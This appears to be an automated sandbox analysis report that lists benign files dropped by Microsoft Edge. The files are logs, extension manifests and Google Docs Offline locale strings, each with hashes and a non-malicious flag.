                                                                                                                                                                                                                                                                                                      SHA-512:7CB1A98E0C7FBB349D9CB681233A9F4ED22A1C3FAADCDF1BC270B04BD97D3FC41AB6F762B2F5F231281D63D96AC3D243640BA81D5E8CCD9F54486B4F538CA8B4
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                      MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                      SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                      SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                      SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:.
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1658
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.408481134189486
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:48:Y4MfJVe5wMd5wMe07cIF5Io0MY5kU2A0OpJ5xnL0MotJ5VovUx0HkyT5sM08K5M:JIVuwEw5MUFZLBQLtgl+M
                                                                                                                                                                                                                                                                                                      MD5:742601D05D27877BB260DF3D6A3F9CBE
                                                                                                                                                                                                                                                                                                      SHA1:9171E7F7F706BC367AD3FA792FF1334E8E9BDE5E
                                                                                                                                                                                                                                                                                                      SHA-256:092A3B0734EC40A59AE947A095EB0BC38CF4AAAB98D3DD83CB752C21870EFAAD
                                                                                                                                                                                                                                                                                                      SHA-512:60E28CFB95252D3BD912FC143433A3A825DD747397150AF3BB320F867ABADDB8775B47B022235DF4C0289540A3E8198A9A5F5277492EF7D8FB7033C187E33DCB
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"logTime": "1005/061810", "correlationVector":"0kV+/vRB8ay0a3Cue7mk6o","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/061810", "correlationVector":"AFo3IfjRT+3l4ojiXpMdNH","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/061810", "correlationVector":"838E3BF9A44F456CB4AD62AC737EDD15","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/063233", "correlationVector":"2N8fwTcZh6EtTfQ8o4+6aX","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/063233", "correlationVector":"5ADEBA42608E4CC9A1FACA719F284CF9","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/063346", "correlationVector":"xp/hBMCdVPtUIxZHIviv/x","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/063347", "correlationVector":"BF0B9E58C0CC45ED9AB5D0371131E69A","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/064305", "correlationVector":"ONVjsWDap1LyjIRdxsqPGs","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/064305", "correlationVector":"82E52491
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):154477
                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                                                      MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                                                      SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                                                      SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                                                      SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):11185
                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                                      MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                                      SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                                      SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                                      SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1753
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.8889033066924155
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                                                                                                                                                                      MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                                                                                                                                                                      SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                                                                                                                                                                      SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                                                                                                                                                                      SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "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",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):9815
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.1716321262973315
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                                                                                                                                                                                      MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                                                                                                                                                                                      SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                                                                                                                                                                                      SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                                                                                                                                                                                      SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):10388
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.174387413738973
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                                                                                                                                                                      MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                                                                                                                                                                      SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                                                                                                                                                                                      SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                                                                                                                                                                      SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):962
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.698567446030411
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                                                                                                                                                                      MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                                                                                                                                                                                      SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                                                                                                                                                                      SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                                                                                                                                                                                      SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):4982
                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.929761711048726
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                                                                                                                                                                      MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                                                                                                                                                                      SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                                                                                                                                                                      SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                                                                                                                                                                      SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):908
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.512512697156616
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                                                                                                                                                                      MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                                                                                                                                                                      SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                                                                                                                                                                      SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                                                                                                                                                                      SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1285
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.702209356847184
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                                                                                                                                                                      MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                                                                                                                                                                      SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                                                                                                                                                                      SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                                                                                                                                                                      SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1244
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.5533961615623735
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                                                                                                                                                                                      MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                                                                                                                                                                                      SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                                                                                                                                                                                      SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                                                                                                                                                                                                                                      SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):977
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.867640976960053
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                                                                                                                                                                                      MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                                                                                                                                                                                      SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                                                                                                                                                                                      SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                                                                                                                                                                                      SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):3107
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.535189746470889
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                                                                                                                                                                                                                                                                                      MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                                                                                                                                                                                                                                      SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                                                                                                                                                                                                                                      SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                                                                                                                                                                                                                                                                      SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1389
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.561317517930672
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
                                                                                                                                                                                                                                                                                                      MD5:2E6423F38E148AC5A5A041B1D5989CC0
                                                                                                                                                                                                                                                                                                      SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
                                                                                                                                                                                                                                                                                                      SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
                                                                                                                                                                                                                                                                                                      SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1763
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.25392954144533
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
                                                                                                                                                                                                                                                                                                      MD5:651375C6AF22E2BCD228347A45E3C2C9
                                                                                                                                                                                                                                                                                                      SHA1:109AC3A912326171D77869854D7300385F6E628C
                                                                                                                                                                                                                                                                                                      SHA-256:1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
                                                                                                                                                                                                                                                                                                      SHA-512:958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):930
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.569672473374877
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
                                                                                                                                                                                                                                                                                                      MD5:D177261FFE5F8AB4B3796D26835F8331
                                                                                                                                                                                                                                                                                                      SHA1:4BE708E2FFE0F018AC183003B74353AD646C1657
